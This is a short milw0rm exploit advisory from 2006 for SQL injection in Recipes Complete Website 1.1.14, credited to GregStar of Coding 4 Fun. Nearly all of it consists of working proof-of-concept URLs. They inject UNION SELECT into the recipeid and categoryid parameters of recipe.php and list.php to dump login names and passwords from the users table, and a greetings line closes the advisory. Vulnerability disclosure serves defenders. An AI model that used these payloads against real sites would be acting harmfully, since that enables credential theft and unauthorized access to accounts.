*************************************************************************************************************************# # Coding 4 Fun # # *************************************************************************************************************************# # * Recipes Complete Website 1.1.14 (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; # # * Class = SQL Injection ; # # * Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ; # # * Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ; # # -------------------------------------------------------------------------------------------------------------------------# # # - PoC: # # http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* # # -------------------------------------------------------------------------------------------------------------------------# http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login # # -------------------------------------------------------------------------------------------------------------------------# http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password # # *************************************************************************************************************************# Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch. # # *************************************************************************************************************************# # milw0rm.com [2006-11-23]